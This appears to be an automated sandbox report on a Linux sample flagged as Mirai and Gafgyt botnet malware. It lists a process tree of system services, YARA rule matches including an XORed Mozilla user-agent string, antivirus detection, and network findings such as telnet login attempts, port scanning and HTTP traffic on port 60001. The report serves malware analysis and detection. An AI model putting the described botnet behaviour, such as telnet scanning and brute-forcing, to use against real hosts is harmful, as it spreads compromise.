  • whoopsie (PID: 5750, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5757, Parent: 1)
  • dbus-daemon (PID: 5757, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5762, Parent: 1)
  • gpu-manager (PID: 5762, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5820, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5821, Parent: 5820)
      • grep (PID: 5821, Parent: 5820, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5822, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5823, Parent: 5822)
      • grep (PID: 5823, Parent: 5822, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5824, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5825, Parent: 5824)
      • grep (PID: 5825, Parent: 5824, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5827, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5828, Parent: 5827)
      • grep (PID: 5828, Parent: 5827, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5830, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5831, Parent: 5830)
      • grep (PID: 5831, Parent: 5830, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5832, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5833, Parent: 5832)
      • grep (PID: 5833, Parent: 5832, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5837, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5838, Parent: 5837)
      • grep (PID: 5838, Parent: 5837, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5839, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5840, Parent: 5839)
      • grep (PID: 5840, Parent: 5839, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5763, Parent: 1)
  • systemd-logind (PID: 5763, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5841, Parent: 1)
  • generate-config (PID: 5841, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5842, Parent: 5841, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5843, Parent: 1)
  • rsyslogd (PID: 5843, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5849, Parent: 1)
  • agetty (PID: 5849, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5850, Parent: 1)
  • systemd-journald (PID: 5850, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5851, Parent: 1)
  • gdm-wait-for-drm (PID: 5851, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5852, Parent: 1)
  • whoopsie (PID: 5852, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5854, Parent: 1)
  • dbus-daemon (PID: 5854, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5857, Parent: 1)
  • systemd-logind (PID: 5857, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5917, Parent: 1)
  • rsyslogd (PID: 5917, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5924, Parent: 1)
  • agetty (PID: 5924, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5925, Parent: 1)
  • systemd-journald (PID: 5925, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5926, Parent: 1)
  • gpu-manager (PID: 5926, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5927, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5928, Parent: 5927)
      • grep (PID: 5928, Parent: 5927, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5930, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5931, Parent: 5930)
      • grep (PID: 5931, Parent: 5930, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5934, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5935, Parent: 5934)
      • grep (PID: 5935, Parent: 5934, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5936, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5938, Parent: 5936)
      • grep (PID: 5938, Parent: 5936, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5940, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5942, Parent: 5940)
      • grep (PID: 5942, Parent: 5940, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5943, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5944, Parent: 5943)
      • grep (PID: 5944, Parent: 5943, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5949, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5950, Parent: 5949)
      • grep (PID: 5950, Parent: 5949, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5951, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5952, Parent: 5951)
      • grep (PID: 5952, Parent: 5951, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5929, Parent: 1)
  • whoopsie (PID: 5929, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5947, Parent: 1860)
  • dbus-daemon (PID: 5947, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5948, Parent: 1860)
  • pulseaudio (PID: 5948, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5953, Parent: 1)
  • rtkit-daemon (PID: 5953, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5956, Parent: 1)
  • dbus-daemon (PID: 5956, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5961, Parent: 1)
  • systemd-logind (PID: 5961, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6018, Parent: 1)
  • generate-config (PID: 6018, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6019, Parent: 6018, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6020, Parent: 1)
  • rtkit-daemon (PID: 6020, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 6021, Parent: 1)
  • rsyslogd (PID: 6021, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6024, Parent: 1)
  • polkitd (PID: 6024, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 6025, Parent: 1)
  • agetty (PID: 6025, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 6029, Parent: 1)
  • whoopsie (PID: 6029, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 6033, Parent: 1)
  • systemd-journald (PID: 6033, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6040, Parent: 1)
  • gdm-wait-for-drm (PID: 6040, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 6041, Parent: 1860)
  • pulseaudio (PID: 6041, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 6046, Parent: 1860)
  • dbus-daemon (PID: 6046, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6049, Parent: 1)
  • whoopsie (PID: 6049, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 6052, Parent: 1)
  • systemd-logind (PID: 6052, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6110, Parent: 1)
  • dbus-daemon (PID: 6110, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
nSg5RM0w0dSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x1354a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x135b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13628:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13696:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13704:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13966:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x139b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13a0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13a5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13aaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
nSg5RM0w0dJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    nSg5RM0w0dJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      nSg5RM0w0dJoeSecurity_GafgytYara detected GafgytJoe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          5281.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x54a:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x5b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x628:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x696:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x704:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x966:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x9b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0xa0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0xa5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0xaaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
          5294.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x54a:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x5b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x628:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x696:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x704:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x966:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x9b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0xa0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0xa5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0xaaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
          5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x1354a:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x135b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x13628:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x13696:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x13704:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x13966:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x139b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x13a0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x13a5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x13aaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
          5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              Click to see the 37 entries

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: nSg5RM0w0dReversingLabs: Detection: 55%
              Source: /usr/bin/pulseaudio (PID: 5386)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5492)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5661)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5842)Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pulseaudio (PID: 5948)Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pkill (PID: 6019)Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pulseaudio (PID: 6041)Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35442 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36684 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36688 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36690 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36692 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36694 version: TLS 1.2

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55138
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55186
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55280
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 188.247.187.146:23 -> 192.168.2.23:36002
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 188.247.187.146:23 -> 192.168.2.23:36002
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55296
              Source: TrafficSnort IDS: 716 INFO TELNET access 41.180.146.95:23 -> 192.168.2.23:40958
              Connects to many ports of the same IP (likely port scanning)Show sources
              Source: global trafficTCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 37668 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 37668 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 37668 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 39302 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 39302 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 39302 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 39302 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43564 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43564 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
